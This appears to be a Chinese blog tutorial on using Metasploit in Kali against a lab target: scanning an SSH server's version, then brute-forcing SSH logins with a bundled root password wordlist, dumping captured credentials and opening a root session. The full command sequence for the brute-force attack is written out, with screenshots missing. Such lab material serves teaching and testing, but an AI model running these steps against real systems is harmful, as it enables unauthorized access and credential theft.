2022-渗透测试-信息收集-Metasploit(基于SSH协议)

简介: 2022-渗透测试-信息收集-Metasploit(基于SSH协议)

 目录

 

1.查看SSH服务的版本信息

2.对ssh进行暴力破解

1.查看SSH服务的版本信息

打开kali系统的Metasploit软件。

image.gif编辑

search version

image.gif编辑

2.use auxiliary/scanner/ssh/ssh_version

image.gif编辑

3.show options

image.gif编辑 4.set RHOSTS 192.168.0.112  设置目标主机-靶机

image.gif编辑

5.run

image.gif编辑

版本是:SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1

2.对ssh进行暴力破解

1.search ssh_login

image.gif编辑

2.使用模块use auxiliary/scanner/ssh/ssh_login

image.gif编辑

3.查看需要配置的参数show options

image.gif编辑

4.设置目标主机 set RHOSTS 192.168.0.112

image.gif编辑

5.设置字典

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

这个字典是kali自带的,后面我们可以自己下载一个更强大的字典导入到kali里面。

image.gif编辑

6.将破解的详细信息打印出来 set VERBOSE true

image.gif编辑

7.run

image.gif编辑

8.creds 列出所有数据库中的凭据,也就是账号和密码

image.gif编辑

9.sessions 查看会话

image.gif编辑

10. 进入会话 sessions -i 1

此时,我们是以root用户进来的。

image.gif编辑

相关文章
|
3月前
|
网络安全
检查使用IP协议远程维护的设备是否配置SSH协议,禁用telnet协议
检查使用IP协议远程维护的设备是否配置SSH协议,禁用telnet协议
124 0
|
3月前
|
缓存 中间件 测试技术
SOME/IP协议实践指南:精选开发与测试工具解析
SOME/IP协议实践指南:精选开发与测试工具解析
211 0
|
3月前
|
Linux 网络安全
CentOS7服务器SSH登陆时自动显示服务器基础信息
CentOS7服务器SSH登陆时自动显示服务器基础信息
123 0
|
3月前
|
移动开发 监控 安全
通过SSH协议实现的屏幕局域网电脑监控:屏幕安全访问代码
随着科技的不断发展,网络安全问题愈发突出。为了确保屏幕数据的安全,我们需要一种高效可靠的监控方法。本文介绍了一种基于SSH协议的屏幕局域网电脑监控方案,同时提供了相关代码示例,确保屏幕数据的安全传输和访问。
271 0
|
3月前
|
存储 缓存 网络协议
dpdk课程学习之练习笔记二(arp, udp协议api测试)
dpdk课程学习之练习笔记二(arp, udp协议api测试)
132 0
|
3月前
|
算法 安全 Shell
SSH:加密安全访问网络的革命性协议
SSH:加密安全访问网络的革命性协议
134 9
|
3月前
|
安全 测试技术 网络架构
【专栏】编写网络设备割接方案的七个步骤,包括明确割接目标、收集信息、制定计划、设计流程、风险评估、准备测试环境和编写文档。
【4月更文挑战第28天】本文介绍了编写网络设备割接方案的七个步骤,包括明确割接目标、收集信息、制定计划、设计流程、风险评估、准备测试环境和编写文档。通过实际案例分析,展示了如何成功完成割接,确保业务连续性和稳定性。遵循这些步骤,可提高割接成功率,为公司的网络性能和安全提供保障。
500 0
|
19天前
|
开发框架 前端开发 JavaScript
ABP框架测试信息---Winform端、动态网站、Vue&Element管理后端等
ABP框架测试信息---Winform端、动态网站、Vue&Element管理后端等
|
2月前
|
机器人 定位技术 C++
技术笔记:ROS中测试机器人里程计信息
技术笔记:ROS中测试机器人里程计信息
|
3月前
|
安全 算法 Shell
ssh远程登录协议
ssh远程登录协议